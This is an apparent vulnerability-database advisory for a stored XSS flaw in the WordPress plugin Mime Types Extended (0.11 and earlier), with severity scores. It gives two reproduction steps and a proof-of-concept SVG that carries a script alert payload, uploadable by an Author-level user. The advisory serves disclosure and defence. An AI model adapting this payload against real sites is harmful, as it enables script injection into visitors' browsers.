Lucene search

K
wpexploitBob MatyasWPEX-ID:1C7547FA-539A-4890-A94D-C57B3D025507
HistoryJun 04, 2024 - 12:00 a.m.

Mime Types Extended <= 0.11 - Author+ Stored XSS via SVG Upload

2024-06-0400:00:00
Bob Matyas
6
admin
enable svg uploads
author
malicious svg
media library
exploit
stored xss
mime types extended

6.1 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

Description The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.

1. As an admin, enable SVG uploads at https://example.com/wp-admin/options-general.php?page=mime-types-extended
2. As an author, upload a malicious SVG via the Media Library. Example SVG:

```
<svg xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert("xss");</script>
</svg>
```

6.1 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

Related for WPEX-ID:1C7547FA-539A-4890-A94D-C57B3D025507